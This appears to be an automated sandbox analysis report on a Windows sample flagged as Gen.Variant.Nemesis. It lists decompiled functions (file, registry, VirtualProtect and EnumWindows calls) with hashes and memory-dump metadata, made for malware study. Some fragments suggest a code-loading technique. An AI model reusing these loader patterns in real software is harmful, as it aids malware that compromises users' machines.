                                                                                                                        			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                                                                                        				signed int _t5;
                                                                                                                        				void* _t6;
                                                                                                                        
                                                                                                                        				_t5 = GetFileAttributesW(_a4); // executed
                                                                                                                        				asm("sbb ecx, ecx");
                                                                                                                        				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                        				return _t6;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415043291-0
                                                                                                                        • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                        • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                        • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                        • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00406008(WCHAR* _a4) {
                                                                                                                        				signed char _t3;
                                                                                                                        				signed char _t7;
                                                                                                                        
                                                                                                                        				_t3 = GetFileAttributesW(_a4); // executed
                                                                                                                        				_t7 = _t3;
                                                                                                                        				if(_t7 != 0xffffffff) {
                                                                                                                        					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                                                        				}
                                                                                                                        				return _t7;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                        • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                                                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                        • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405AEB(WCHAR* _a4) {
                                                                                                                        				int _t2;
                                                                                                                        
                                                                                                                        				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                                                        				if(_t2 == 0) {
                                                                                                                        					return GetLastError();
                                                                                                                        				}
                                                                                                                        				return 0;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                        • GetLastError.KERNEL32 ref: 00405AFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1375471231-0
                                                                                                                        • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                        • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                                                        • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                        • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02AD3203
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        • Opcode ID: 3cc196289f2b753a50570f99e177d665517522efdd8fa0779b5609fc6207d9ff
                                                                                                                        • Instruction ID: b795e0ac49b2375702ad7c8c35fe6d508038a2c3c1f3280272bbd3abc7f128fb
                                                                                                                        • Opcode Fuzzy Hash: 3cc196289f2b753a50570f99e177d665517522efdd8fa0779b5609fc6207d9ff
                                                                                                                        • Instruction Fuzzy Hash: 87615770B00707DFDF249F7899E47EA33A3AF567A0F88816ADC864B151DB358585CB02
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 44%
                                                                                                                        			E70B22B98(void* __ecx, intOrPtr _a4) {
                                                                                                                        				signed int _v8;
                                                                                                                        				void* _t28;
                                                                                                                        				void* _t29;
                                                                                                                        				int _t33;
                                                                                                                        				void* _t37;
                                                                                                                        				void* _t40;
                                                                                                                        				void* _t45;
                                                                                                                        				void* _t49;
                                                                                                                        				signed int _t56;
                                                                                                                        				void* _t61;
                                                                                                                        				void* _t70;
                                                                                                                        				intOrPtr _t72;
                                                                                                                        				signed int _t77;
                                                                                                                        				intOrPtr _t79;
                                                                                                                        				intOrPtr _t80;
                                                                                                                        				void* _t81;
                                                                                                                        				void* _t87;
                                                                                                                        				void* _t88;
                                                                                                                        				void* _t89;
                                                                                                                        				void* _t90;
                                                                                                                        				intOrPtr _t93;
                                                                                                                        				intOrPtr _t94;
                                                                                                                        
                                                                                                                        				if( *0x70b25050 != 0 && E70B22ADB(_a4) == 0) {
                                                                                                                        					 *0x70b25054 = _t93;
                                                                                                                        					if( *0x70b2504c != 0) {
                                                                                                                        						_t93 =  *0x70b2504c;
                                                                                                                        					} else {
                                                                                                                        						E70B230C0(E70B22AD5(), __ecx);
                                                                                                                        						 *0x70b2504c = _t93;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t28 = E70B22B09(_a4);
                                                                                                                        				_t94 = _t93 + 4;
                                                                                                                        				if(_t28 <= 0) {
                                                                                                                        					L9:
                                                                                                                        					_t29 = E70B22AFD();
                                                                                                                        					_t72 = _a4;
                                                                                                                        					_t79 =  *0x70b25058;
                                                                                                                        					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                                                                                        					 *0x70b25058 = _t72;
                                                                                                                        					E70B22AF7();
                                                                                                                        					_t33 = EnumWindows(??, ??); // executed
                                                                                                                        					 *0x70b25034 = _t33;
                                                                                                                        					 *0x70b25038 = _t79;
                                                                                                                        					if( *0x70b25050 != 0 && E70B22ADB( *0x70b25058) == 0) {
                                                                                                                        						 *0x70b2504c = _t94;
                                                                                                                        						_t94 =  *0x70b25054;
                                                                                                                        					}
                                                                                                                        					_t80 =  *0x70b25058;
                                                                                                                        					_a4 = _t80;
                                                                                                                        					 *0x70b25058 =  *((intOrPtr*)(E70B22AFD() + _t80));
                                                                                                                        					_t37 = E70B22AE9(_t80);
                                                                                                                        					_pop(_t81);
                                                                                                                        					if(_t37 != 0) {
                                                                                                                        						_t40 = E70B22B09(_t81);
                                                                                                                        						if(_t40 > 0) {
                                                                                                                        							_push(_t40);
                                                                                                                        							_push(E70B22B14() + _a4 + _v8);
                                                                                                                        							_push(E70B22B1E());
                                                                                                                        							if( *0x70b25050 <= 0 || E70B22ADB(_a4) != 0) {
                                                                                                                        								_pop(_t88);
                                                                                                                        								_pop(_t45);
                                                                                                                        								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                                                                                        								if(__eflags == 0) {
                                                                                                                        								}
                                                                                                                        								asm("loop 0xfffffff5");
                                                                                                                        							} else {
                                                                                                                        								_pop(_t89);
                                                                                                                        								_pop(_t49);
                                                                                                                        								 *0x70b2504c =  *0x70b2504c +  *(_t89 + _t49) * 4;
                                                                                                                        								asm("loop 0xffffffeb");
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t107 =  *0x70b25058;
                                                                                                                        					if( *0x70b25058 == 0) {
                                                                                                                        						 *0x70b2504c = 0;
                                                                                                                        					}
                                                                                                                        					E70B22B42(_t107, _a4,  *0x70b25034,  *0x70b25038);
                                                                                                                        					return _a4;
                                                                                                                        				}
                                                                                                                        				_push(E70B22B14() + _a4);
                                                                                                                        				_t56 = E70B22B1A();
                                                                                                                        				_v8 = _t56;
                                                                                                                        				_t77 = _t28;
                                                                                                                        				_push(_t68 + _t56 * _t77);
                                                                                                                        				_t70 = E70B22B26();
                                                                                                                        				_t87 = E70B22B22();
                                                                                                                        				_t90 = E70B22B1E();
                                                                                                                        				_t61 = _t77;
                                                                                                                        				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                                                                                        					_push( *((intOrPtr*)(_t70 + _t61)));
                                                                                                                        				}
                                                                                                                        				_push( *((intOrPtr*)(_t87 + _t61)));
                                                                                                                        				asm("loop 0xfffffff1");
                                                                                                                        				goto L9;
                                                                                                                        			}

























                                                                                                                        0x70b22c08
                                                                                                                        0x70b22c1c
                                                                                                                        0x70b22c1d
                                                                                                                        0x70b22c1e
                                                                                                                        0x70b22c20
                                                                                                                        0x70b22c25
                                                                                                                        0x70b22c27
                                                                                                                        0x70b22c27
                                                                                                                        0x70b22c2a
                                                                                                                        0x70b22c30
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • EnumWindows.USER32(00000000), ref: 70B22C57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumWindows
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1129996299-0
                                                                                                                        • Opcode ID: 49d6d45c19fd9ce16cf5ead741ce7865cab5f80dad940e6fa601af85f2b4f0df
                                                                                                                        • Instruction ID: e290aa7e8e2d3d31293d3dea9f9026cca2474129c302046706435e2c0a3478f8
                                                                                                                        • Opcode Fuzzy Hash: 49d6d45c19fd9ce16cf5ead741ce7865cab5f80dad940e6fa601af85f2b4f0df
                                                                                                                        • Instruction Fuzzy Hash: 804173B2500204FFDB259F65EDC6B5E37F4FB44356F308425E809C7121DA39AB829B95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d7784699b659131f70fa0e7e842f773b6092e6ab96a0144425c64b7ee47b8d69
                                                                                                                        • Instruction ID: 15e86b6ec0a5d6526b107046fb76d09933c6b809c78137c37efe24b498e3c621
                                                                                                                        • Opcode Fuzzy Hash: d7784699b659131f70fa0e7e842f773b6092e6ab96a0144425c64b7ee47b8d69
                                                                                                                        • Instruction Fuzzy Hash: 75413A70A08347DFDF346E7899A53DA3BA2AF263A0F90417EDC4A9B145DB3585468B01
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02AD3203
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        • Opcode ID: f20b3d388287464f711dc990e50ab6dbf9ab0854c29475c836f70bfdc7537346
                                                                                                                        • Instruction ID: e0df1b7d0b3e3c5ff1ff78e76fe8cbfc570e337325295920ad4b438a9f9dde0e
                                                                                                                        • Opcode Fuzzy Hash: f20b3d388287464f711dc990e50ab6dbf9ab0854c29475c836f70bfdc7537346
                                                                                                                        • Instruction Fuzzy Hash: AE110874B00357EFDF306E6C99E97DA27929F25390F80407AAC499B204DB3589458B41
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004023B2(int __eax, WCHAR* __ebx) {
                                                                                                                        				WCHAR* _t11;
                                                                                                                        				WCHAR* _t13;
                                                                                                                        				void* _t17;
                                                                                                                        				int _t21;
                                                                                                                        
                                                                                                                        				_t11 = __ebx;
                                                                                                                        				_t5 = __eax;
                                                                                                                        				_t13 = 0;
                                                                                                                        				if(__eax != __ebx) {
                                                                                                                        					__eax = E00402DA6(__ebx);
                                                                                                                        				}
                                                                                                                        				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                                                                                        					_t13 = E00402DA6(0x11);
                                                                                                                        				}
                                                                                                                        				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                                                                                        					_t11 = E00402DA6(0x22);
                                                                                                                        				}
                                                                                                                        				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                                                                                        				_t21 = _t5;
                                                                                                                        				if(_t21 == 0) {
                                                                                                                        					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                                                        				}
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfileStringWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 390214022-0
                                                                                                                        • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                        • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                                                        • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                        • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                        				void* _t7;
                                                                                                                        				long _t8;
                                                                                                                        				void* _t9;
                                                                                                                        
                                                                                                                        				_t7 = E00406329(_a4,  &_a12);
                                                                                                                        				if(_t7 != 0) {
                                                                                                                        					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                                                        					return _t8;
                                                                                                                        				}
                                                                                                                        				_t9 = 6;
                                                                                                                        				return _t9;
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                        • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                                                                                        • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                        • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004060DF(void* _a4, void* _a8, long _a12) {
                                                                                                                        				int _t7;
                                                                                                                        				long _t11;
                                                                                                                        
                                                                                                                        				_t11 = _a12;
                                                                                                                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					return 1;
                                                                                                                        				}
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3934441357-0
                                                                                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                        • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                        • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004060B0(void* _a4, void* _a8, long _a12) {
                                                                                                                        				int _t7;
                                                                                                                        				long _t11;
                                                                                                                        
                                                                                                                        				_t11 = _a12;
                                                                                                                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					return 1;
                                                                                                                        				}
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                        • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                                                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                        • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                        
                                                                                                                        				 *0x70b25048 = _a4;
                                                                                                                        				if(_a8 == 1) {
                                                                                                                        					VirtualProtect(0x70b2505c, 4, 0x40, 0x70b2504c); // executed
                                                                                                                        					 *0x70b2505c = 0xc2;
                                                                                                                        					 *0x70b2504c = 0;
                                                                                                                        					 *0x70b25054 = 0;
                                                                                                                        					 *0x70b25068 = 0;
                                                                                                                        					 *0x70b25058 = 0;
                                                                                                                        					 *0x70b25050 = 0;
                                                                                                                        					 *0x70b25060 = 0;
                                                                                                                        					 *0x70b2505e = 0;
                                                                                                                        				}
                                                                                                                        				return 1;
                                                                                                                        			}




                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(70B2505C,00000004,00000040,70B2504C), ref: 70B22A9D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 544645111-0
                                                                                                                        • Opcode ID: 1738d012920e6012ec86f9ca786a62c21b23a44557d72f2be3407a63ad40e95f
